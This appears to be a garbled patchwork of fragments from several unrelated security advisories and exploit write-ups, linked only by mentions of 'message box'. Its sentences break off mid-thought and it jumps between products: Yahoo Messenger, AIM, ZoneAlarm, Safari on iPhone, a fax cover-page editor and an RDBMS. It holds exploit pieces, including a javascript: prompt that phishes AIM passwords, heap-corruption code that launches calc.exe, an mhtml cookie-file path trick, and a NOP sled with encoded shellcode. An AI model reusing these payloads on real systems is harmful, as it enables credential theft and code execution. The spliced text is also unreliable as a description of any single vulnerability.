message box
Details:
========
A buffer overflow vulnerability is detected in Yahoo's IMessenger v11.5 client software.
The bug is located in the drag & drop message box function of the software when processing specially crafted file transfers.
The vulnerability allows a local attacker to crash the software (reliably) together with all bound Yahoo components.
Vulnerable Module(s):
[+] Drag & Drop - Message Box
tags only. JavaScript statements may also be executed through the use of
other HTML controls and some of the attack vectors that we mention do not
even rely on JavaScript for successful exploitation.
The following proof-of-concept code will display a prompt box to the
victim, requesting to type in the victim's AIM credentials. It will look
authentic due to the fact that the message box is not part of the text
message window:
- -- begin code --
<img src='javascript:var passwd=window.prompt("You have been
disconnected from the network.\nPlease re-enter your password to
for its protocol without any encryption or authentication. This can be
abused to leak the username of a currently logged on user. Disclosed
usernames can be used in further attacks on different services and/or
ease bruteforcing of user accounts.
Furthermore, if ELBA receives an invalid serialized method name an
assertion fails and a message box with an attacker-controlled value
is displayed, and the user is forced to shut down the application. This
can be abused to disrupt the work of a user, or as part of a social
engineering attack, since the message box displays a message
controllable by the attacker.
Accept-Encoding: gzip
Accept: */*
Content-Type: text/plain
User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2
- ZoneAlarm 8's TrueVector component crashes with a message box and writes a minidump file to Temp; on closing the message box, it restarts after a few moments.
- ZoneAlarm leaves the system unprotected (HIDS module alone) until the TrueVector component is back.
- Demonstration Video links :
}
//verify we overwrote the deleted option object successfully
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;
alert("success, calc.exe should start once you close this message box");
//now do something with the corrupted option object
corruptedoption.parentNode.click();
}
The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less than or equal to -1,
in which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However, by crafting a packet with any
negative value in the Error Code field different from -1 the lookup for
the corresponding error string will fail triggering a non-recoverable
error and thus terminating the server process.
The Safari version running on the iPhone supports handling the TEL [1]
protocol through launching the telephony/dialer application. This is
done by passing the provided phone number to the telephony
application. Under normal conditions, loading a tel: URI results in a
message box asking the user's permission to call the given number. The
user is presented with the simple choice to either press call or
cancel.
A TEL URI can be opened automatically if the TEL URI is used as the
source of an HTML iframe or frame, as the URL of a meta refresh, as
By using a positive value greater than 0 and lower than the total number
of elements, it is possible to cause a problem during the freeing of the
allocated object.
The provided proof-of-concept demonstrates the possibility of executing
code immediately after the acknowledgement of the initial message box,
when FXSCOVER!CDrawDoc::Remove is called by
FXSCOVER!CDrawDoc::DeleteContents.
Modifications:
00005098 FE CC // code execution starts from here
mhtml:\\127.0.0.1\C$\Documents%20and%20Settings\USERNAME\Cookies\evilCookie.txt
- -----------/
The contents of your boot.ini file will be displayed in a message box
(or could be programmatically sent to a remote web site).
Note that if you reference this file in a different way than using the
UNC, the privileged VB script code (which requires local machine zone
permissions to execute) won't execute. For example, accessing the file
- -----/
2. Authentication bypass
A remote attacker can log in to the RDBMS using an existing or non-existing UserID
without a password. This is possible because the authentication process takes
place on the client side. When the password is incorrect, the client application resets the connection
to the server and shows a message box. If the password is correct, the client sends the
server the UserID that it will then use in the RDBMS.
Packet 3. From client to server, when password for UserID TEST2 is correct:
0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
// The DLL self-registers as a Browser Helper Object, but it
// doesn't actually do anything BHO-like -- it just hooks
// MSHTML.DLL during DllGetClassObject, then "fails." Being a
// BHO is a convenient way to get loaded into Internet Explorer.
// (Note that it may also load into Explorer.) If it can't
// hook the system's MSHTML.DLL, it will display a message box
// informing the user of the failure.
//
// NO WARRANTIES. Use at your own risk. Redistribution of this
// source code in its original, unmodified form is permitted.
//
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En
buffersize = 205
nopsled = "\x90" * 4
# Custom MessageBox
# x86/shikata_ga_nai succeeded with size 104 (iteration=1)
shellcode = ("\xd9\xe5\x29\xc9\xbe\xe0\xc8\xa6\x9f\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x83\xc7\x04\x31\x77\x14\x03\x77\xf4\x2a\x53\xf7\x8c\x8a"
"\xbc\x08\x04\xac\xd9\x4a\xbb\x5a\x47\x38\x30\xfa\xef\xd1\xdb"
"\xdc\xa2\x45\x60\x68\x4e\xe2\xef\x71\xd8\x6f\x8b\x54\x19\x18"